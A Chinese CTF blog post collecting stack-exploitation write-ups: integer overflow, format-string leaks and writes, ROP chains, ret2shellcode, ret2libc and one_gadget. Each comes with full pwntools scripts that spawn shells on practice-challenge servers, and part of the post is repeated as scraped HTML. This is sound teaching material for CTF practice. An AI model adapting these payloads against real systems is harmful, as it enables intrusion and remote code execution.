栈漏洞合集

Author： PoilZero
发布时间：April 27, 2021
1164 views
No comments
19521 words
Categories： CTF-Summary

ctf-pwn-栈漏洞合集

标准栈溢出

buu-pwn：1-5
buu-pwn：buu-get_started_3dsctf_2016
漏洞原理：根据栈图通过栈溢出覆盖如返回值，某个变量值等

例题题解

buu-pwn1-5：http://poilzero.sipc115.club/index.php/archives/67/
buu-get_started_3dsctf_2016：http://poilzero.sipc115.club/index.php/archives/106/

整数溢出

目的

利用整数溢出漏洞可以绕过注入strlen(s)的检测

基本原理如下：

整数类型在超出自己最大大小的时候会执行以下操作
将自己与最大数取模
例如1byte的最大0-255当255+5的时候%256==4

bjdctf_2020_babystack2

此处整数溢出第一个输入值，使得第二个数组能够溢出写入

nbytes查询是占四个字节，之后转换为unsigned int都是四个字节大小
但是unsigned的最高位是代表数字，signed的最高位是符号位
因此输入值0x80000000对应的0b10000000000000000000000000000000在转换后就是0
而对于检测10x80000000加上任何是数结果都是小于0的都能过长度检测

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf; // [rsp+0h] [rbp-10h]
  size_t nbytes; // [rsp+Ch] [rbp-4h]

  setvbuf(_bss_start, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 1, 0LL);
  LODWORD(nbytes) = 0;
  puts("**********************************");
  puts("*     Welcome to the BJDCTF!     *");
  puts("* And Welcome to the bin world!  *");
  puts("*  Let's try to pwn the world!   *");
  puts("* Please told me u answer loudly!*");
  puts("[+]Are u ready?");
  puts("[+]Please input the length of your name:");
  __isoc99_scanf("%d", &nbytes);
  if ( (signed int)nbytes > 10 )
  {
    puts("Oops,u name is too long!");
    exit(-1);
  }
  puts("[+]What's u name?");
  read(0, &buf, (unsigned int)nbytes);
  return 0;
}

[BJDCTF 2nd]r2t3

本题与ciscn_2019_c_1的逃避strlen检查的区别在于
ciscn_2019_c_1中是用gets输入的gets会输入直到eof或者\n因此可以读入\0
[BJDCTF 2nd]r2t3是用read，read会输入直到\0截断，因此没法用\0逃避检查

'''
基本环境
'''
from pwn import *
from LibcSearcher import *

context(os='linux', arch='amd64', log_level='debug')
p = remote('node3.buuoj.cn', 28866)
elf = ELF('r2t3')
# rdi;ret: p64(0x400c83)
# ret:     p64(0x4006b9)

sleep(0.3)
payload  = b'a'*(0x11 + 0x4) + p32(0x804858B)
p.sendline(payload.ljust(0x104, b'a'))
p.sendline(payload)
sleep(0.3)
p.sendline(b'cat flag')
p.interactive()

格式化收集漏洞

泄露栈值

比如泄露eip，或者canary来后续hack

sipcoj exam1 pwn1 节选

# env
from pwn import*

context(os="linux", arch="i386", log_level="debug")
r = remote("39.96.76.44",28016)
elf = ELF('pwn1')

# read 1
# r.sendafter('step1:\n', 'AAAA %0x %0x %0x %0x %0x %0x %0x %0x %0x %0x %0x')
r.sendafter('step1:\n', '%15$p %19$p') # %15$p
r.recvuntil('0x')
canary_raw = r.recv(8)
canary_add = p32(int(canary_raw,16))
print('\n---canary is :',canary_raw)

# printf 1
r.recvuntil('0x')
main_raw = r.recv(8)
print('\n---main is :',main_raw)
print('raw',main_raw,main_raw.decode(encoding='utf8')[0:5],main_raw.decode(encoding='utf8')[5:8])

修改固定地址变量

漏洞原理：https://www.cnblogs.com/0xJDchen/p/5904816.html
buu-pwn-[第五空间2019 决赛]PWN5

from pwn import *

context.log_level = 'debug'  # 显示调试的信息
p = remote("node3.buuoj.cn" , 26117)


payload = b'AAAA %0x %0x %0x %0x %0x %0x %0x %0x %0x %0x %0x'
# 第十个是 41414141 即偏移值是10
# 三个参数 偏移值 {要修改变量的地址:变量修改的值}
payload = fmtstr_payload(10,{0x804C044:520})

p.sendlineafter(b'your name:', payload)
p.sendlineafter(b'your passwd:', b'520')
p.sendlineafter('ok!!\n', 'cat flag')
p.interactive()

xctf-CGfsb

from pwn import *

context(os="linux", arch="i386", log_level="debug")
r = remote("111.200.241.244", 43348)
sleep(0.3)
r.sendlineafter('please tell me your name:', 'poilzero')
# payload = b'AAAA %0x %0x %0x %0x %0x %0x %0x %0x %0x %0x %0x %0x'
payload = fmtstr_payload(10,{0x0804A068:8})
r.sendlineafter('leave your message please:\n', payload)
r.interactive()

ROP总

搜索gadget

常见指令如下

# 查找可存储寄存器的代码
ROPgadget --binary [filepath]  --only 'pop|ret'
# 查找字符串
ROPgadget --binary [filepath] --string "/bin/sh"
ROPgadget --binary [filepath] --string "sh"
# 查找有int 0x80的地址
ROPgadget --binary [filepath]  --only 'int'

x64栈构造

# rdi;ret: p64(0x400c83)
# ret:     p64(0x4006b9)
# ×64程序基本都存在的一个地址[pop rdi;ret]
pop_rdi_ret = p64(0x400c83)

# bin_sh_address system_address需要计算得到
# unbuntu 64x 调用system的时候要加ret进行对齐，其他的情况下不需要
ret = p64(0x4006b9)
payload  = offset + ret
# 其中的pop_rdi_ret + p64(bin_sh_address)其实就是64x调用规范中的代表传入第一个参数
# 在64位中，有rdi,rsi,rdx,rcx,r8,r9几个寄存器保存参数。
payload += pop_rdi_ret + p64(bin_sh_address) + p64(system_address) + ret_add

x32栈构造

理论

构造格式

一个指令：cmd_address：gap_：arg1
- 后面不需要参数则不需要gap_
如system('/bin/sh')+exit(0)
- system_address：exit_address：binsh_address：p32(0x0)
- 其中，exit_address是再system('/bin/sh')执行完成后返回的地址
- 然后程序会执行exit(0)
如write(1, write_got, 0x4)
- write_plt：main_add：write_got：p32(0x4)

实例

picoctf_2018_rop chain

'''
基本环境
'''
from pwn import *
from LibcSearcher import *

p = remote('node3.buuoj.cn', 25395)
context(os='linux', arch='i386', log_level='debug')
elf = ELF('PicoCTF_2018_rop_chain')
# libc= ELF('libc-2.29.so')

win1 = 0x80485CB
win2 = 0x80485D8
flag = 0x804862B
payload = b'a'*(0x18+0x4)
payload+= p32(win1) + p32(win2) + p32(flag)
# -1163220307 -559039827
payload+= p32(0xBAAAAAAD) + p32(0xDEADBAAD)
sleep(0.3)
p.sendline(payload)
sleep(0.3)
p.interactive()

# flag{d6966bc5-1e31-45ed-9a7d-a7e66e04f25d}

ret2shellcode

others_shellcode

ciscn_2019_n_5

from pwn import *
# asm模块需要指定arch
context(arch='amd64', os="linux", log_level="debug")
elf = ELF('ciscn_2019_n_5')

r = remote("node3.buuoj.cn", 28651)
shell_code = asm(shellcraft.sh())

r.recvuntil("tell me your name\n")
r.sendline(shell_code)

payload = b'a'*0x28 + p64(0x601080)
r.recvuntil("What do you want to say to me?\n")
r.sendline(payload)

sleep(0.3)
r.sendline('cat flag')
r.interactive()
# flag{c38fb238-58ee-4da2-a300-6215a89cf5d7}

ret2libc

本文是以
x64的cdecl函数调用约定（x64最常见的函数调用约定）为基础来撰写的
泄露puts函数地址为例，此外也可以泄露任何已使用过的函数（got表有数据）的地址来计算
注：x32的调用规则与本文不太一致（system_address + exit_address + binsh_address + b'0'*8）

基本原理

return to libc

通过栈溢出覆盖 eip使得程序 return to libc

libc是动态链接共享库，里面有很多函数和字符串段
比如 system() puts() gets()
比如 '/bin/sh'

于是乎我只要构造溢出的数据，就能使得程序自动执行

system('/bin/sh')也就是getshell了

libc address

但是其中有一个很关键的问题，libc动态库的函数或者字符串有以下几个特性

在程序每次运行的时候，libc库的基地址都是不一样的
但是无论如何，libc之间函数或者字符串的相对地址不变（确定libc版本的情况下）

因此我们得先获得libc的基址才能实现我们的目的return to libc，而这一点，我们是通过

先构造函数调用puts(elf.got['puts'])获得泄露的puts函数真实地址
然后通过LibSearcher('puts', puts_real_address)（确定libc版本确定相对地址）计算偏移值
从而得到我们想要的目标system('/bin/sh')调用所需要用到的参数

基本流程

所需的环境

注意，其中的rdi;ret部分内容根据你的需求不同。

传入的参数不止一个比如，你得去找相对应的rdi,rsi,rdx,rcx,r8,r9对应的ret。

from pwn import *
from LibcSearcher import *

p = remote('node3.buuoj.cn', 27417)
context(os='linux', arch='amd64', log_level='debug')
elf = ELF('ciscn_2019_c_1')
# rdi;ret: p64(0x400c83)
# ret:     p64(0x4006b9)

构造地址泄露

对于x64 liunx，通过栈溢出实现，调用puts实现泄露puts函数地址

call-》plt-》got-》实际在内存中的地址
plt表和got表是固定的，在plt文件内可以找到，内存地址不固定
plt表：调用需要使用plt表的值
got表：用于获取函数实际在内存中的地址

# 用来读取plt和got表
elf = ELF('test_c_1')

# ×64程序基本都存在的一个地址[pop rdi;ret]
pop_rdi_ret = p64(0x400c83)
# 执行结束后返回到main函数地址（以防止栈结构被破坏）
payload  = offset
# 即使用puts_plt表嗲用puts(*puts_got)==puts(puts_real_address)
payload += pop_rdi_ret + p64(elf.got['puts']) + p64(elf.plt['puts'])
# 执行完后返回main
payload += p64(elf.symbols('main'))

获取libc信息

对泄露的puts函数实际地址进行格式化，以此为参数得到libc库的信息

# 使用pwntools读取得到返回的地址
raw_rev = ...
puts_real_addr = u64(raw_rev.ljust(8, b'\x00'))

# 使用LibSearcher进行搜索得到libc的库信息
# 比如版本号，类型等
libc = LibSearcher('puts', puts_real_addr)

计算sh地址

"/bin/sh"，system地址

计算libc的基址从而计算出注入"/bin/sh"，system函数的地址，从而实现调用system函数

# puts_addr是实际运行中libc中puts的地址，与libc.dump对应的地址比较计算得到基址
libc_base   = puts_addr - libc.dump('gets') 
system_addr = libc_base + libc.dump('system') 
binsh_addr  = libc_base + libc.dump('str_bin_sh')

调用shell

对于x64 liunx，调用system的标准压栈顺序：

# ×64程序基本都存在的一个地址[pop rdi;ret]
pop_rdi_ret = p64(0x400c83)

# bin_sh_address system_address需要计算得到
# unbuntu 64x 调用system的时候要加ret进行对齐，其他的情况下不需要
ret = p64(0x4006b9)
payload  = offset + ret
# 其中的pop_rdi_ret + p64(bin_sh_address)其实就是64x调用规范中的代表传入第一个参数
# 在64位中，有rdi,rsi,rdx,rcx,r8,r9几个寄存器保存参数。
payload += pop_rdi_ret + p64(bin_sh_address) + p64(system_address)

bjdctf_2020_babyrop

本题LibcSearcher查不到（puts）而read，libc_start_main的对应找到的libc算出来的地址都是错的，尝试了buu提供的对应的ubuntu16的libc.so.2.23（libc.so.2.25）

#coding=utf-8
from pwn import *
from LibcSearcher import *

# libc = LibcSearcher('puts', 0x7f3d9e3866900000)

context(os="linux", arch="amd64", log_level="debug")
elf = ELF("./bjdctf_2020_babyrop")
lib = ELF("./libc-2.23.so")
r = remote('node3.buuoj.cn', 26887)# process("./easyheap")

pop_rdi = p64(0x400733)
ret     = p64(0x4004c9)

# 64
offset  = b'a'*0x20 + b'g'*0x8
payload = offset + pop_rdi + p64(0x601018) + p64(elf.plt['puts']) + p64(elf.symbols['main'])

r.sendlineafter('Pull up your sword and tell me u story!\n', payload)
raw = r.recv(6)
add = u64(raw.ljust(8, b'\x00'))
print(raw, raw.ljust(8, b'\x00'), hex(add))

# exit(0)
# libc = LibcSearcher('puts', add)
# LibcSearcher不能用
libc_base = add - lib.symbols['puts']
# ROPgadget --binary /home/poilzero/pwn/libc-2.23.so --string "/bin/sh"
binsh_add = libc_base + 0x18cd57
system_add= libc_base + lib.symbols['system']

payload = offset + ret + pop_rdi + p64(binsh_add) + p64(system_add)
r.sendlineafter('Pull up your sword and tell me u story!\n', payload)

sleep(0.3)
r.sendline('cat flag')
r.interactive()
# flag{93f43e9e-0ac4-40a8-8a10-bcbc76529f64}

铁人三项(第五赛区)_2018_rop

#coding=utf-8
from pwn import *
from LibcSearcher import *

context(os="linux", arch="i386", log_level="debug")
elf = ELF("./2018_rop")
r = remote('node3.buuoj.cn', 26607)# process("./easyheap")

# 32
offset  = b'a'*0x88 + b'g'*0x4
payload = offset + p32(elf.plt['write']) + p32(elf.symbols['main'])
payload+= p32(1) + p32(elf.got['write']) + p32(0x4)

r.sendline(payload)
raw = r.recv(4)
add = u32(raw)
print(raw, hex(add))

libc = LibcSearcher('write', add)
libc_base = add - libc.dump('write')
system_add= libc_base + libc.dump('system')
binsh_add = libc_base + libc.dump('str_bin_sh')

payload = offset + p32(system_add) + p32(elf.symbols['m0ain']) + p32(binsh_add)
# r.sendlineafter('Hello, World\n', payload)
r.sendline(payload)

sleep(0.3)
r.sendline('cat flag')
r.interactive()

ciscn_2019_c_1

buu-pwn-ciscn_2019_c_1：https://blog.csdn.net/qq_41560595/article/details/108940662

注册机如下

'''
基本环境
'''
from pwn import *
from LibcSearcher import *

p = remote('node3.buuoj.cn', 27417)
context(os='linux', arch='amd64', log_level='debug')
elf = ELF('ciscn_2019_c_1')
# rdi;ret: p64(0x400c83)
# ret:     p64(0x4006b9)
'''
构造puts(*puts_got)
'''
# puts泄露libc-puts地址
offset = b'\0' + b'a'*(0x50 - 1 + 8)
payload  = offset + p64(0x400c83)
payload += p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(elf.symbols['main'])
p.sendlineafter(b'Input your choice!\n', b'1')
p.sendlineafter(b'Input your Plaintext to be encrypted\n', payload)

'''
获得libc库信息
'''
p.recvuntil(b'Ciphertext\n')
p.recvline()
raw = p.recvline()
add = u64(raw[:-1].ljust(8, b'\x00'))
print(raw, add)
libc = LibcSearcher('puts', add)
# exit(0)
'''
计算sh真实地址
'''
libc_base = add - libc.dump('puts')
binsh_add = libc_base + libc.dump('str_bin_sh')
system_add= libc_base + libc.dump('system')
payload = offset + p64(0x4006b9)
payload+= p64(0x400c83) + p64(binsh_add) + p64(system_add)
'''
调用system('/bin/sh')
'''
p.sendlineafter(b'Input your choice!\n', b'1')
p.sendlineafter(b'Input your Plaintext to be encrypted\n', payload)
'''
cat flag!
'''
sleep(0.3)
p.sendline(b'cat flag')
p.interactive()

ciscn_2019_en_2

# rdi;ret: p64(0x400c83)
# ret:     p64(0x4006b9)

这题和上一题差不多，两题写的时间间隔比较长，这一题是后来写的

from pwn import *
from LibcSearcher import *
context(os='linux', arch='i386', log_level='debug')
r = remote('node3.buuoj.cn', 29206)
elf = ELF('ciscn_2019_en_2')

# 溢出值 s 0x30但是之前还有一个变量应该是临时变量，总空间占据0x50
offset  = b'\0' + b'a'*(0x50-1+8)
'''
step1 turn 1
get puts_real_add
'''
payload = '1'
r.sendlineafter('Input your choice!\n', payload)

# rdi;ret: p64(0x400c83)
# ret:     p64(0x4006b9)
payload = offset + p64(0x400c83) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(elf.symbols['main'])
r.sendlineafter('Input your Plaintext to be encrypted', payload)
'''
step2 turn 1
caculate the needed address
'''
r.recvuntil(b'Ciphertext\n\n')
raw = r.recv(6)
# u64即可字符串地址转真地址(数字类型)，大小端转换
add = u64(raw.ljust(8, b'\x00'))
print(raw, hex(add))

libc = LibcSearcher('puts', add)
libc_base  = add - libc.dump('puts')
system_add = libc_base + libc.dump('system')
binsh_add  = libc_base + libc.dump('str_bin_sh')

'''
step3 turn 2
jump to system('/bin/sh')
'''
payload = '1'
r.sendlineafter('Input your choice!\n', payload)

# rdi;ret: p64(0x400c83)
# ret:     p64(0x4006b9)
payload = offset + p64(0x4006b9) + p64(0x400c83) + p64(binsh_add) + p64(system_add)
r.sendlineafter('Input your Plaintext to be encrypted', payload)

sleep(0.3)
r.sendline('cat flag')
r.interactive()

OGeek2019-babyrop

基本流程

读取文件
sub_804871F
- 会输出文件内容
- 一个0x20u的read可以溢出
sub_80487D0
- 一个0xe7的read可以溢出

int __cdecl sub_804871F(int a1)
{
  size_t v1; // eax
  char s; // [esp+Ch] [ebp-4Ch]
  char buf[7]; // [esp+2Ch] [ebp-2Ch]
  unsigned __int8 v5; // [esp+33h] [ebp-25h]
  ssize_t v6; // [esp+4Ch] [ebp-Ch]

  memset(&s, 0, 0x20u);
  memset(buf, 0, 0x20u);
  sprintf(&s, "%ld", a1);
  v6 = read(0, buf, 0x20u);
  buf[v6 - 1] = 0;
  v1 = strlen(buf);
  if ( strncmp(buf, &s, v1) )
    exit(0);
  write(1, "Correct\n", 8u);
  return v5;
}

ssize_t __cdecl sub_80487D0(char a1)
{
  ssize_t result; // eax
  char buf; // [esp+11h] [ebp-E7h]

  if ( a1 == 127 )
    result = read(0, &buf, 0xC8u);
  else
    result = read(0, &buf, a1);
  return result;
}

整体思路

本地没给system函数的got/plt表，因此得泄露某个函数地址

得到libc库版本
得到libc库偏移值

然后计算得到system bin_sh_add地址才行。

而本题只有一个sprintf是输出函数，而sprintf执行前在main中都有清空buffer区的代码，因此不能把某个函数真实地址写入buffer区然后读取，但是可以劫持write把地址写入文件，然后正常读取。

因为是x32 cdecl调用，栈的格式为（这里用write泄露write地址）：

构造格式：

一个指令：cmd_address：gap_：arg1
- 后面不需要参数则不需要gap_
如system('/bin/sh')+exit(0)
- system_address：exit_address：binsh_address：p32(0x0)
- 其中，exit_address是再system('/bin/sh')执行完成后返回的地址
- 然后程序会执行exit(0)

# write(1, *write_got, 4) 即写入模式，写入write真实地址，写入4个字节（32位）
# 因为要调用后返回main调用system因此返回地址为main函数地址
p32(write_plt_add):p32(main_add):p32(1):p32(write_got_add):p32(4)

然后第二次执行sub_804871F的时候直接溢出使得直接调用system('/bin/sh')即可

第二次payload构造

p32(system_add):p32(exit_add):p32(binsh_add):p32(0)

通过泄露的write地址计算所需的地址：

# 使用pwntools读取得到返回的地址
raw_rev = ...
puts_addr = u64(raw_rev.ljust(8, b'\x00'))

# 使用LibSearcher进行搜索得到libc的库信息
# 比如版本号，类型等
libc = LibSearcher('puts', puts_addr)

# puts_addr是实际运行中libc中puts的地址，与libc.dump对应的地址比较计算得到基址
libc_base   = puts_addr - libc.symbol('gets') 
system_addr = libc_base + libc.dump('system') 
binsh_addr  = libc_base + libc.dump('str_bin_sh')

注册机

其中有个未解开的疑点，如何使用elf读取libc并且得到字符串地址，参考上一题

LibSearcher生成的对象libc1
pwntools中的ELF生成的对象的libc2
方法一：
libc1.dump('str_bin_sh')
方法二：
X无法验证：libc2.search("/bin/sh").next()
方法三：
前面都是使用pwntools或者LibSearcher，这一种是使用one_gadget指令实现
liunx下one_gadget libc文件

其中三种都没法用，最后在网上找的地址

# env
from pwn import *
from LibcSearcher import *

context(os="linux", arch="i386", log_level="debug")
r = remote("node3.buuoj.cn",26970)
elf = ELF('pwn_baby')
libc= ELF('libc-2.23.so')


binsh_offset = libc.search('/bin/sh')
# binsh_real   = int(binsh_offset,16)
print('bin_sh',binsh_offset, type(binsh_offset))
# print(libc.symbols['bin_sh'])
# print(libc.symbols['str_bin_sh'])

### turn 1
# 溢出覆盖v5
payload = b'\x00' + b'a'*6
payload+= b'\xff'
sleep(0.3)
r.sendline(payload)

# 第二个函数溢出得到write函数地址，然后返回到main重新执行一次
r.recvuntil('Correct\n')
payload = b'a'*(0xe7 + 4)
# payload+= p32(elf.plt['write']) + p32(elf.symbols['main']) + p32(1) + p32(elf.got['write']) + p32(4)
payload+= p32(elf.plt['write']) + p32(0x08048825) + p32(1) + p32(elf.got['write']) + p32(4)
r.sendline(payload)

### turn 2
# 格式化处理得到的write地址
write_raw_add = r.recv(4) # 四字节32位就是地址长度
write_add = u32(write_raw_add) # return int address
print('write_add', hex(write_add))
# 计算地址
# libc = LibcSearcher('write', write_add)
libc_base = write_add - libc.symbols['write']
system_add= libc_base + libc.symbols['system']
exit_add  = libc_base + libc.symbols['exit']
libc = LibcSearcher('write', write_add)
binsh_add = libc_base + 0x15902b #libc.search('/bin/sh').next()#libc.dump('str_bin_sh') #libc.search('/bin/sh').next()
# 组成payload
payload = b'a'*(0xe7 + 4)
payload+= p32(system_add) + p32(exit_add) + p32(binsh_add) + p32(0)

# 溢出覆盖v5
payload2 = b'\x00' + b'a'*6
payload2+= b'\xff'
sleep(0.3)
r.sendline(payload2)

# send
r.recvuntil('Correct\n')
r.sendline(payload)

### flag
sleep(0.3)
r.sendline('cat flag')
r.interactive()

one_gadget

https://blog.csdn.net/weixin_43092232/article/details/105085880

基本逻辑

连上会送你printf的地址，而且本身也给了你libc的文件（白送）。

你只要通过这两者，算出bin_sh的地址输入就会给你flag了

以下是组件的介绍：

libc

LibSearcher生成的对象libc1
ELF生成的对象的libc2
libc1.dump['puts']==libc2.symbol['puts']

字符串相对地址

LibSearcher生成的对象libc1
pwntools中的ELF生成的对象的libc2
方法一：
libc1.dump('str_bin_sh')
方法二：
X无法验证：libc2.search("/bin/sh").next()
方法三：
前面都是使用pwntools或者LibSearcher，这一种是使用one_gadget指令实现
liunx下one_gadget libc文件

注册机

'''
基本环境
'''
from pwn import *
from LibcSearcher import *

p = remote('node3.buuoj.cn', 25683)
context(os='linux', arch='amd64', log_level='debug')
elf = ELF('one_gadget')
libc= ELF('libc-2.29.so')

'''
得到printf的真实地址
'''
p.recvuntil(b'0x')
raw = p.recvline()
add = int(raw[:-1],16)
print(raw[:-1],add)
'''
计算bin_sh函数的地址然后会直接给你shell
'''
libc_base = add - libc.symbols['printf']
# libc_binsh= libc_base + libc.dump['str_bin_sh']
# libc_system=libc_base + libc.dump['system']
# one_gadget=libc.search('/bin/sh')#.next()#0x106ef8
# print(one_gadget)
# bin_sh基址可以通过one_gadget得到(最后一个)
bin_sh    = libc_base+0x106ef8
sleep(0.3)
p.sendline(str(bin_sh))
'''
cat flag
'''
p.sendline(b'cat flag')
p.interactive()

Last modification：June 29, 2021

如果觉得我的文章对你有用，请随意赞赏。咖啡（12RMB）进度+100%，一块巧克力（1RMB）进度+6%。
（赞赏请备注你的名称哦！后台记录中来自理工小菜狗）

栈漏洞合集

PoilZero • 2021 年 04 月 27 日

<h1>ctf-pwn-栈漏洞合集</h1><h2>标准栈溢出</h2><blockquote><p>buu-pwn：1-5</p><p>buu-pwn：buu-get_started_3dsctf_2016</p><p>漏洞原理：根据栈图通过栈溢出覆盖如返回值，某个变量值等</p></blockquote><p>例题题解</p><ul><li>buu-pwn1-5：<span class="external-link"><a class="no-external-link" href="http://poilzero.sipc115.club/index.php/archives/67/" target="_blank"><i data-feather="external-link"></i>http://poilzero.sipc115.club/index.php/archives/67/</a></span></li><li>buu-get_started_3dsctf_2016：<span class="external-link"><a class="no-external-link" href="http://poilzero.sipc115.club/index.php/archives/106/" target="_blank"><i data-feather="external-link"></i>http://poilzero.sipc115.club/index.php/archives/106/</a></span></li></ul><h2>整数溢出</h2><h3>目的</h3><p>利用整数溢出漏洞可以绕过注入strlen(s)的检测</p><h3>基本原理如下：</h3><ul><li>整数类型在超出自己最大大小的时候会执行以下操作</li><li>将自己与最大数取模</li><li>例如1byte的 最大0-255当255+5的时候%256==4</li></ul><h3>bjdctf_2020_babystack2</h3><p>此处整数溢出第一个输入值，使得第二个数组能够溢出写入</p><ul><li>nbytes查询是占四个字节，之后转换为unsigned int都是四个字节大小</li><li>但是unsigned的最高位是代表数字，signed的最高位是符号位</li><li>因此输入值<code>0x80000000</code>对应的<code>0b10000000000000000000000000000000</code>在转换后就是0</li><li>而对于检测1<code>0x80000000</code>加上任何是数结果都是小于0的都能过长度检测</li></ul><pre><code>int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf; // [rsp+0h] [rbp-10h]
  size_t nbytes; // [rsp+Ch] [rbp-4h]

setvbuf(_bss_start, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 1, 0LL);
  LODWORD(nbytes) = 0;
  puts(&quot;**********************************&quot;);
  puts(&quot;*     Welcome to the BJDCTF!     *&quot;);
  puts(&quot;* And Welcome to the bin world!  *&quot;);
  puts(&quot;*  Let&#039;s try to pwn the world!   *&quot;);
  puts(&quot;* Please told me u answer loudly!*&quot;);
  puts(&quot;[+]Are u ready?&quot;);
  puts(&quot;[+]Please input the length of your name:&quot;);
  __isoc99_scanf(&quot;%d&quot;, &amp;nbytes);
  if ( (signed int)nbytes &gt; 10 )
  {
    puts(&quot;Oops,u name is too long!&quot;);
    exit(-1);
  }
  puts(&quot;[+]What&#039;s u name?&quot;);
  read(0, &amp;buf, (unsigned int)nbytes);
  return 0;
}</code></pre><h3>[BJDCTF 2nd]r2t3</h3><blockquote><p>本题与ciscn_2019_c_1的逃避strlen检查的区别在于</p><ul><li>ciscn_2019_c_1中是用gets输入的gets会输入直到eof或者\n因此可以读入\0</li><li>[BJDCTF 2nd]r2t3是用read，read会输入直到\0截断，因此没法用\0逃避检查</li></ul></blockquote><pre><code>&#039;&#039;&#039;
基本环境
&#039;&#039;&#039;
from pwn import *
from LibcSearcher import *

context(os=&#039;linux&#039;, arch=&#039;amd64&#039;, log_level=&#039;debug&#039;)
p = remote(&#039;node3.buuoj.cn&#039;, 28866)
elf = ELF(&#039;r2t3&#039;)
# rdi;ret: p64(0x400c83)
# ret:     p64(0x4006b9)

sleep(0.3)
payload  = b&#039;a&#039;*(0x11 + 0x4) + p32(0x804858B)
p.sendline(payload.ljust(0x104, b&#039;a&#039;))
p.sendline(payload)
sleep(0.3)
p.sendline(b&#039;cat flag&#039;)
p.interactive()</code></pre><p><img src="http://poilzero.cn/usr/themes/handsome/assets/img/loading.svg" alt="image-20210308205057605" title="image-20210308205057605" style=""data-original=""></p><h2>格式化收集漏洞</h2><h3>泄露栈值</h3><ul><li>比如泄露eip，或者canary来后续hack</li></ul><blockquote>sipcoj exam1 pwn1 节选</blockquote><pre><code># env
from pwn import*

context(os=&quot;linux&quot;, arch=&quot;i386&quot;, log_level=&quot;debug&quot;)
r = remote(&quot;39.96.76.44&quot;,28016)
elf = ELF(&#039;pwn1&#039;)

# read 1
# r.sendafter(&#039;step1:\n&#039;, &#039;AAAA %0x %0x %0x %0x %0x %0x %0x %0x %0x %0x %0x&#039;)
r.sendafter(&#039;step1:\n&#039;, &#039;%15$p %19$p&#039;) # %15$p
r.recvuntil(&#039;0x&#039;)
canary_raw = r.recv(8)
canary_add = p32(int(canary_raw,16))
print(&#039;\n---canary is :&#039;,canary_raw)

# printf 1
r.recvuntil(&#039;0x&#039;)
main_raw = r.recv(8)
print(&#039;\n---main is :&#039;,main_raw)
print(&#039;raw&#039;,main_raw,main_raw.decode(encoding=&#039;utf8&#039;)[0:5],main_raw.decode(encoding=&#039;utf8&#039;)[5:8])</code></pre><h3>修改固定地址变量</h3><blockquote><p>漏洞原理：<span class="external-link"><a class="no-external-link" href="https://www.cnblogs.com/0xJDchen/p/5904816.html" target="_blank"><i data-feather="external-link"></i>https://www.cnblogs.com/0xJDchen/p/5904816.html</a></span></p><p>buu-pwn-[第五空间2019 决赛]PWN5</p></blockquote><pre><code>from pwn import *

context.log_level = &#039;debug&#039;  # 显示调试的信息
p = remote(&quot;node3.buuoj.cn&quot; , 26117)

payload = b&#039;AAAA %0x %0x %0x %0x %0x %0x %0x %0x %0x %0x %0x&#039;
# 第十个是 41414141 即偏移值是10
# 三个参数 偏移值 {要修改变量的地址:变量修改的值}
payload = fmtstr_payload(10,{0x804C044:520})

p.sendlineafter(b&#039;your name:&#039;, payload)
p.sendlineafter(b&#039;your passwd:&#039;, b&#039;520&#039;)
p.sendlineafter(&#039;ok!!\n&#039;, &#039;cat flag&#039;)
p.interactive()</code></pre><blockquote>xctf-CGfsb</blockquote><pre><code>from pwn import *

context(os=&quot;linux&quot;, arch=&quot;i386&quot;, log_level=&quot;debug&quot;)
r = remote(&quot;111.200.241.244&quot;, 43348)
sleep(0.3)
r.sendlineafter(&#039;please tell me your name:&#039;, &#039;poilzero&#039;)
# payload = b&#039;AAAA %0x %0x %0x %0x %0x %0x %0x %0x %0x %0x %0x %0x&#039;
payload = fmtstr_payload(10,{0x0804A068:8})
r.sendlineafter(&#039;leave your message please:\n&#039;, payload)
r.interactive()</code></pre><h2>ROP总</h2><h3>搜索gadget</h3><blockquote>常见指令如下</blockquote><pre><code># 查找可存储寄存器的代码
ROPgadget --binary [filepath]  --only &#039;pop|ret&#039;
# 查找字符串
ROPgadget --binary [filepath] --string &quot;/bin/sh&quot;
ROPgadget --binary [filepath] --string &quot;sh&quot;
# 查找有int 0x80的地址
ROPgadget --binary [filepath]  --only &#039;int&#039;</code></pre><h3>x64栈构造</h3><pre><code># rdi;ret: p64(0x400c83)
# ret:     p64(0x4006b9)
# ×64程序基本都存在的一个地址[pop rdi;ret]
pop_rdi_ret = p64(0x400c83)

# bin_sh_address system_address需要计算得到
# unbuntu 64x 调用system的时候要加ret进行对齐，其他的情况下不需要
ret = p64(0x4006b9)
payload  = offset + ret
# 其中的pop_rdi_ret + p64(bin_sh_address)其实就是64x调用规范中的代表传入第一个参数
# 在64位中，有rdi,rsi,rdx,rcx,r8,r9几个寄存器保存参数。
payload += pop_rdi_ret + p64(bin_sh_address) + p64(system_address) + ret_add</code></pre><h3>x32栈构造</h3><h4>理论</h4><p>构造格式</p><ul><li><p>一个指令：cmd_address：gap_：arg1</p><ul><li>后面不需要参数则不需要gap_</li></ul></li><li><p>如system('/bin/sh')+exit(0)</p><ul><li>system_address：exit_address：binsh_address：p32(0x0)</li><li>其中，exit_address是再system('/bin/sh')执行完成后返回的地址</li><li>然后程序会执行exit(0)</li></ul></li><li><p>如write(1, write_got, 0x4)</p><ul><li>write_plt：main_add：write_got：p32(0x4)</li></ul></li></ul><h4>实例</h4><blockquote>picoctf_2018_rop chain</blockquote><pre><code>&#039;&#039;&#039;
基本环境
&#039;&#039;&#039;
from pwn import *
from LibcSearcher import *

p = remote(&#039;node3.buuoj.cn&#039;, 25395)
context(os=&#039;linux&#039;, arch=&#039;i386&#039;, log_level=&#039;debug&#039;)
elf = ELF(&#039;PicoCTF_2018_rop_chain&#039;)
# libc= ELF(&#039;libc-2.29.so&#039;)

win1 = 0x80485CB
win2 = 0x80485D8
flag = 0x804862B
payload = b&#039;a&#039;*(0x18+0x4)
payload+= p32(win1) + p32(win2) + p32(flag)
# -1163220307 -559039827
payload+= p32(0xBAAAAAAD) + p32(0xDEADBAAD)
sleep(0.3)
p.sendline(payload)
sleep(0.3)
p.interactive()

